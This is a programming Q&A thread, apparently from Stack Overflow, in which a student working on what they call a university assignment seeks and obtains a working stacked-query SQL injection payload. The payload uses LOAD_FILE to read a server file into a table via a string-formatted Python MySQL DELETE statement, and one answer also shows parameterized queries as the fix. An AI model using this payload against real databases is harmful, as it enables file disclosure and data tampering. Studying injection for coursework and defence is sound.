# OperationalError: (1292, 'Truncated incorrect DOUBLE value: \'1\'; UPDATE foo SET text = LOAD_FILE(\'/something/something.txt\');"-- \' ')

Tags: python, mysql, sql-injection

I WANT TO inject this string - so that it would update the text in table foo to the text that is red from the file (I don't care what it does with the previous delete statement)

```
"1\\'; UPDATE foo SET text = LOAD_FILE(\\'/something/something.txt\\');\"-- "
```

into the python code, where id is set to my string: (this cannot be changed since it is given)

```
"DELETE FROM bar WHERE user_id = \'%s\' and bar_id = \'%s\';"%(str(user_id), str(id))
```

**EDIT:**
It worked like this (without the last quotation mark and #-  instead of --):
"1\'; UPDATE foo SET text = LOAD_FILE(\'/something/something.txt\'); #- "

Comment: Even if you succeed in injecting that content, the Python MySQLdb `execute()` method won't run multiple statements separated by semicolon unless you use the `multi=True` option. So this type of SQL injection is totally preventable by the client app. See https://dev.mysql.com/doc/connector-python/en/connector-python-api-mysqlcursor-execute.html

Comment: Thanks for your reply. This is an university assignment and the injection should be done at exactly this place, so it is supposed to work. The execute is called later.

Answer (score 0, accepted):

It worked like this (without the last quotation mark and #- instead of --):

```
"1\'; UPDATE foo SET text = LOAD_FILE(\'/something/something.txt\'); #- "
```

Answer (score 1):

You don´t need the backslash and, if the id is an integer you don´t either need the '. You should rewrite it like this:

```
"DELETE FROM bar WHERE user_id = '%s' and bar_id = '%s';"%(str(user_id), str(id))
```

And you should use prepared statements to avoid sql injection. You could use prepared statement like this (in this one you must take off the ')

```
cursor.execute("DELETE FROM bar WHERE user_id = %s and bar_id = %s;",(str(user_id), str(id),))
```

**EDIT**
If you do something like :

```
x="1\'; UPDATE foo SET text = LOAD_FILE(\'/something/something.txt\'); --"
y="DELETE FROM bar WHERE user_id = \'%s\' and bar_id = \'%s" % (2,x)
```

What you get in y is

```
DELETE FROM bar WHERE user_id = '2' and bar_id = '1'; UPDATE foo SET text = LOAD_FILE('/something/something.txt'); --
```

Comment: Thanks for the response, but that isn't quite what I was going for. If you could check my edit, it could be a better explanation what I want to achieve.

Comment: ProgrammingError: (1064, 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'"-- \'\' at line 1') 

I get syntax error if I execute it like this. (I tried doing it with two \\ or with \ or none, nothing worked)

Comment: Sorry i thought you needed the "-- " at the end, i modified my answer

Comment: As far as I understand mySQL code injection I do need -- at the end to comment out the ' " symbols, at least I used it in other examples

Comment: As far as I understand mySQL code injection I do need -- at the end to comment out the ' " symbols, at least I used it in other examples

Comment: I edited again, you just need to add the -- at the end of x. But you don´t need the -- if you are not going to make any comment

Comment: Yes, now it's the same as mine :)

Comment: So if the answer it´s ok, you could upvote and accept my answer